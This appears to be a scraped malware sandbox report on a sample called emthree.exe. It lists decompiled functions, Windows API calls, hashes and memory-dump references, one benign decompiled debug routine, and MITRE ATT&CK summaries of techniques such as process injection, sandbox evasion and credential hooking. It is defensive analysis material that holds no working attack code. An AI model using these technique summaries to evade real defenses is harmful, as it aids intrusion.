Function 02DA8C56, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02DA8D08

Strings

net.dll, xrefs: 02DA8CD1, 02DA8D2F, 02DA8D3B
wininet.dll, xrefs: 02DA8CBE, 02DA8CC7

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 5f13f8630b4ea672a09270852822347165fcb6e58c6539702e134b6ce144b972
Instruction ID: f92f21d083b11e25056fe691a65c35762d5815a860b96509a1d8ec5ebce20550
Opcode Fuzzy Hash: 5f13f8630b4ea672a09270852822347165fcb6e58c6539702e134b6ce144b972
Instruction Fuzzy Hash: 0E318EB2900644BFCB20DF64C884F6ABBB4FF48704F14815DEA59AB341D775A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA250, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D93AF8), ref: 02DAA27D

Strings

.z`, xrefs: 02DAA26C, 02DAA278

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 9fde8f79129296eabad62a6bf3620879abf5467ec668f0b6aea48e4315ab8808
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 25E046B1200208ABDB18EF99CC48EA777ADEF88750F018658FE085B341C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02D98373, Relevance: 3.2, APIs: 2, Instructions: 181threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D9834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D9836B

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c5896be731a3a4b42687d911ab56aa40e57b094ef25896738c9399396df43080
Instruction ID: 8035e5a0704d19c0ec68054b6bdb439c77d9ab7eeb35596891feb47a7e908a26
Opcode Fuzzy Hash: c5896be731a3a4b42687d911ab56aa40e57b094ef25896738c9399396df43080
Instruction Fuzzy Hash: 2A61ACB1A00209AFDB24DF64C885FAA77A9EF0A704F00456EF54AD7341DB70AE01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D982F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D9834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D9836B

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f854c52ab528575da3ed32feed5aa92cefdd0ec95e0f062333ecd1e981d0e4c5
Instruction ID: b037029d19e392892f9ec61e91af7d86d6bb6daec0853ba37ee416841673d4bc
Opcode Fuzzy Hash: f854c52ab528575da3ed32feed5aa92cefdd0ec95e0f062333ecd1e981d0e4c5
Instruction Fuzzy Hash: EB01A731A402287BEB20A6949C02FBE776CAB41F51F044115FF04FA2C0E6D46D0696F5

Uniqueness

Uniqueness Score: -1.00%

Function 02D982B7, Relevance: 3.0, APIs: 2, Instructions: 44threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D9834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D9836B

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d73c61a6f495a5886f3316309de16a8217628b3a83bbe2f0d6c3eb1ada145eee
Instruction ID: 2805e85b11bfced20f396074b831bbadcb2d5f7da2963e3fad75fe1520e98b2c
Opcode Fuzzy Hash: d73c61a6f495a5886f3316309de16a8217628b3a83bbe2f0d6c3eb1ada145eee
Instruction Fuzzy Hash: 65F0E232A8062836EB2066985C42FBF625DAB82F11F154119FF04FA2C0E7D56D065AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D9ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D9AD42

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
Instruction ID: 01b412763e72fd99abff5e804a0d2e0997e53f57b6cc3b5c1e7ea0f53b38e740
Opcode Fuzzy Hash: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
Instruction Fuzzy Hash: D3010CB6E4020DABDF10DAA4DC51F9DB3B9AB54208F104195A90897340F631EB54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA2C0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DAA314

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 3fb6103b0af15ca67c893ce3e75464b404bfd69a50e54fd0608c336b9630ecf3
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 2E01AFB2210108ABCB54DF89DC90EEB77AEAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA1D6, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02DA4506,?,02DA4C7F,02DA4C7F,?,02DA4506,?,?,?,?,?,00000000,00000000,?), ref: 02DAA23D

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c88a9df3e89932c88e9d59e4b04687a5bf5d5f3bf623729e1adec0eaaa9c9acc
Instruction ID: 93be4538aec17c37f8f9dcd0a7f538cb06398ef51260167b639232b5a0c1c884
Opcode Fuzzy Hash: c88a9df3e89932c88e9d59e4b04687a5bf5d5f3bf623729e1adec0eaaa9c9acc
Instruction Fuzzy Hash: 51F082726402146BD724EF94DC94EA7B7A9EF85350F1485A5F94C9B201D6319950CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DA8D90, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D9F020,?,?,00000000), ref: 02DA8DCC

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6511a16e4b14917326b122896ceb71f5618538fd8af596954ebce1b8c8a2f46e
Instruction ID: 3e52228ebf628b06f88578f27a1f1f2e93600dc15d071db7ea86fe717032d4e0
Opcode Fuzzy Hash: 6511a16e4b14917326b122896ceb71f5618538fd8af596954ebce1b8c8a2f46e
Instruction Fuzzy Hash: A2E092333813043AE730659DAC02FE7B39CCB91B25F540026FB0DEB2C0D595F90146A5

Uniqueness

Uniqueness Score: -1.00%

Function 02DA8D83, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D9F020,?,?,00000000), ref: 02DA8DCC

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 694d33176f405edb255a5154f6537ec4b841492a61a21fdb8736dc2d5a9f05f6
Instruction ID: 8c37cd315722b56c241e1a5761990e6b76719c92bdde71857b3f46193d12edc2
Opcode Fuzzy Hash: 694d33176f405edb255a5154f6537ec4b841492a61a21fdb8736dc2d5a9f05f6
Instruction Fuzzy Hash: EEF0E5323813003AD2206A589C12FA37B598B52B10F140159FA49AB3C1D6D5F90186A5

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA210, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02DA4506,?,02DA4C7F,02DA4C7F,?,02DA4506,?,?,?,?,?,00000000,00000000,?), ref: 02DAA23D

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 32d0d16250d55c78af36d67eed9cfb1b8e5f2c2fb5e4cc15eb1b9bb82ac34b0e
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 15E012B1200208ABDB14EF99CC40EA777ADEF88650F118558BA085B241C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA3B0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D9F1A2,02D9F1A2,?,00000000,?,?), ref: 02DAA3E0

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 11d3795f2dbc767ac380c2ae0033c43a88b1a6f7dde9e7f332d338a0706ebc3f
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 9DE01AB12002086BDB10DF49CC84EE777ADEF88650F018154BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D9F697, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02D98CF4,?), ref: 02D9F6CB

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 05f1cce9227cab663635d016f84c5865b96ef4d79a9f03a948cf3d0d0ed674a3
Instruction ID: da2577176da32787266874e0a147cedaa6a5bfc1ba0b0613021ee56410aa2d01
Opcode Fuzzy Hash: 05f1cce9227cab663635d016f84c5865b96ef4d79a9f03a948cf3d0d0ed674a3
Instruction Fuzzy Hash: AFE0C2757903007FEB10FBA4DC06F1733AAAB85714F0900A9F588DB3D3EA64E511C622

Uniqueness

Uniqueness Score: -1.00%

Function 02D9F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02D98CF4,?), ref: 02D9F6CB

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3b8733ff40dbe60899a868be32700c17fdbd49cd30ce02c539a8a25725954d77
Instruction ID: 4d3e26852980e3f2e460a4616428bb240af008fb747deea2e605c3018ecc41d9
Opcode Fuzzy Hash: 3b8733ff40dbe60899a868be32700c17fdbd49cd30ce02c539a8a25725954d77
Instruction Fuzzy Hash: 85D05E716903043AEA10BAA49C02F26328A9B44A04F490064FA48D63C3EA50E5008565

Uniqueness

Uniqueness Score: -1.00%

Function 04EE967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE9694

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42fa723d30c6106229a04ee04e84fbedab0e8cebeb7ab5da5632a9866dbfbbb9
Instruction ID: f9d12b513348adcbe2ce2a03b9de3b356432eb6ea9d48ab45235f63d3561838f
Opcode Fuzzy Hash: 42fa723d30c6106229a04ee04e84fbedab0e8cebeb7ab5da5632a9866dbfbbb9
Instruction Fuzzy Hash: 5AB09BB19014C5C5F711D7614E08B277D4477D0745F17D492D2030641B477CD0D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04F3FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04F3FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04EECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04F35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04F35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04f3fdda
0x04f3fde2
0x04f3fde5
0x04f3fdec
0x04f3fdfa
0x04f3fdff
0x04f3fe0a
0x04f3fe0f
0x04f3fe17
0x04f3fe1e
0x04f3fe19
0x04f3fe19
0x04f3fe19
0x04f3fe20
0x04f3fe21
0x04f3fe22
0x04f3fe25
0x04f3fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F3FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F3FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F3FE2B

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: b86328904b1edb1f1bd5aeaecfbf2f7c1879371f3d90b5b3fede74320f695e30
Instruction ID: 170a6f3d4fbc2a8ec3a5cc09ea8c2397cf769d2bc03260ac65fc6a371ae204e7
Opcode Fuzzy Hash: b86328904b1edb1f1bd5aeaecfbf2f7c1879371f3d90b5b3fede74320f695e30
Instruction Fuzzy Hash: 92F0F672640201BFEA241A45DC02F33BB9AEB84731F240354F628561E1EA62FC6196F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report emthree.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Function 00419FF0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041A120, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 0041A06B, Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre